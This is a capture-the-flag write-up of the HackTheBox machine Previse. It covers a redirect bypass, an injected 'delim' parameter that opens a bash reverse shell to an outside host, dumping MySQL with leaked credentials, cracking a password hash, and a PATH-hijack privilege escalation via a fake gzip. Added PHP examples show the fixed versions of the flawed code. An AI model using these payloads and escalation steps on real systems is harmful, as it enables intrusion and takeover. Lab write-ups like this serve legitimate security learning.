HTB Previse writeup
Flow

Information gathering

─# nmap -A -p- --min-rate=1000 -T4 10.10.11.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:03 PDT
Nmap scan report for 10.10.11.104
Host is up (0.52s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 414.58 ms 10.10.16.1
2 587.74 ms 10.10.11.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.33 seconds

Only ports 22 and 80 are open.

Web

Start with port 80: there is only a login page. I tried password brute-forcing and SQL injection, neither worked. Later I read the official description of the machine, which is about redirects. The scan had found nav.php, and clicking any of the other PHP pages redirects back to login.php. Let's look at the Burp history.

You can see that the response body contains the full content of accounts.php, but the status code is 302. We intercept the response in Burp ("Do intercept"), and change the status code of the response.

Now it is no longer redirected to login.php, and the normal accounts page is shown.

We create a new user here and then log in normally; after logging in we are no longer redirected.
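The redirect bug described above, reproduced as an added example (not the Previse source): a header() redirect without a following exit keeps rendering the protected page into the 302 body, which is why the full accounts.php content was visible in Burp. Session key and page names are assumptions.

```php
<?php
// Added example, not the Previse source. It reproduces the bug class the
// writeup exploited (a 302 whose body still contains the protected page) next
// to the fix. The session key and page names are assumptions.
session_start();

// Vulnerable shape: header() queues the redirect, but nothing stops the script,
// so the protected HTML below is still rendered into the 302 response body.
// A proxy shows the full page, and a client that rewrites the status to 200
// renders it as if it were logged in.
function require_login_vulnerable(): void
{
    if (empty($_SESSION['user'])) {
        header('Location: login.php');
        // missing exit: execution falls through to the protected content
    }
}

// Fixed shape: terminate immediately after sending the redirect, so the
// response body is empty no matter what the rest of the file contains.
function require_login(): void
{
    if (empty($_SESSION['user'])) {
        header('Location: login.php', true, 302);
        exit;
    }
}

require_login();
// Only an authenticated session reaches this point.
?>
<h1>Accounts</h1>
<!-- The account-creation form would follow here. With the fixed check it is
     never written to the response for an unauthenticated client, so changing
     the status code on the client side gains nothing. -->
```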

Then in download.php I found a downloadable archive, SITEBACKUP.zip. It turns out to be the site's source code. In config.php you can see the MySQL username and password, which will be useful later. After some searching, I found an exec() call in logs.php whose variable is user-controllable, so a command injection vulnerability is very likely.

Find the PHP page that exports the logs and capture the request.

Change the value of the delim parameter:

delim=%3bbash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.4/1234+0>%261'%3b

Reverse shell obtained.

Privilege escalation

First thing after getting the shell: log into MySQL.
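The logs.php pattern described above, as an added example (not the Previse source): a POST field reaching exec() unfiltered, next to a hardened version that accepts only named delimiters and quotes the argument. The export script path and the delimiter names are assumptions.

```php
<?php
// Added example, not the Previse source. It models the logs.php pattern the
// writeup describes (a POST field, delim, reaching exec()) and a hardened
// version. The export script path and the delimiter names are assumptions.

// Vulnerable shape: the raw parameter is concatenated into the shell command
// line. A value containing ';' (as in the writeup's payload) ends the intended
// command and starts another one, running as the web server user.
function export_command_vulnerable(string $delim): string
{
    return "/usr/bin/python /opt/scripts/log_process.py $delim";
}

// Hardened shape: map a fixed set of delimiter names to the real characters,
// reject anything else, and quote the argument anyway so shell metacharacters
// can never be interpreted.
const ALLOWED_DELIMS = ['comma' => ',', 'space' => ' ', 'tab' => "\t"];

function export_command(string $delim): string
{
    if (!array_key_exists($delim, ALLOWED_DELIMS)) {
        throw new InvalidArgumentException('unsupported delimiter');
    }
    return '/usr/bin/python /opt/scripts/log_process.py '
        . escapeshellarg(ALLOWED_DELIMS[$delim]);
}

// Request handler: a bad value is a 400 response, never a shell command.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    try {
        exec(export_command($_POST['delim'] ?? ''), $lines, $rc);
        header('Content-Type: text/plain');
        echo implode("\n", $lines);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo 'unsupported delimiter';
    }
}
```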

www-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'use previse;select * from accounts;'
mysql: [Warning] Using a password on the command line interface can be insecure.
id username password created_at
1 m4lwhere $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. 2021-05-27 18:18:36
2 admin $1$🧂llol$G3KunFyMrVvsqYP1JpRi70 2024-09-13 02:06:23

We get m4lwhere's salted password hash; we still need to see what type of hash it is.

Then in the accounts.php source we find the storage logic.

It is the crypt() function with MD5, so we specify the format for john:

john hash --wordlist=/home/kali/Desktop/rockyou.txt --format=md5crypt-long

Finally we get the password ilovecody112235! and log in as m4lwhere.

First thing: sudo -l, which shows a usable script.
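Why one wordlist run covered the whole accounts table, as an added example (not the Previse source): both dumped hashes share the prefix "$1$🧂llol$", i.e. crypt() with MD5-crypt and one fixed salt for every user, contrasted here with password_hash(). The salt value is taken from the writeup's output; the sample password is constructed.

```php
<?php
// Added example, not the Previse source. The two hashes dumped from the
// accounts table share the prefix "$1$🧂llol$", i.e. crypt() with MD5-crypt
// and one fixed salt for every user. This contrasts that scheme with
// password_hash(); the salt value is taken from the writeup's output.

// Weak: fixed salt, fast MD5-based hash. Equal passwords give equal hashes,
// and one wordlist run with john --format=md5crypt-long covers every account.
function hash_fixed_salt(string $password): string
{
    return crypt($password, '$1$🧂llol$');
}

// Stronger: password_hash() draws a random salt per call and uses a slow
// algorithm (bcrypt for PASSWORD_DEFAULT); the salt and cost are stored in the
// result, so verification needs nothing else from the application.
function hash_password(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function verify_password(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Two accounts with the same (constructed) password: under the fixed salt the
// stored values are identical, under password_hash() they differ yet both
// verify against the original password.
$same_fixed  = hash_fixed_salt('example-pass') === hash_fixed_salt('example-pass');
$h1 = hash_password('example-pass');
$h2 = hash_password('example-pass');
$same_random = $h1 === $h2;
var_dump($same_fixed, $same_random,
         verify_password('example-pass', $h1), verify_password('example-pass', $h2));
```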

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ ls -l /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun 6 2021 /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

We have no write permission on the script. First idea: manipulate the environment, since the script calls gzip.

cd /tmp
echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip
chmod +x gzip
export PATH=/tmp:$PATH
sudo /opt/scripts/access_backup.sh

Privilege escalation succeeded.

Summary

HTB really is high quality and moderately difficult; every kind of knowledge is needed. The redirect analysis at the start counts as basic, and going through it again in this review reinforced it. Auditing the source once you have it really does require patience...
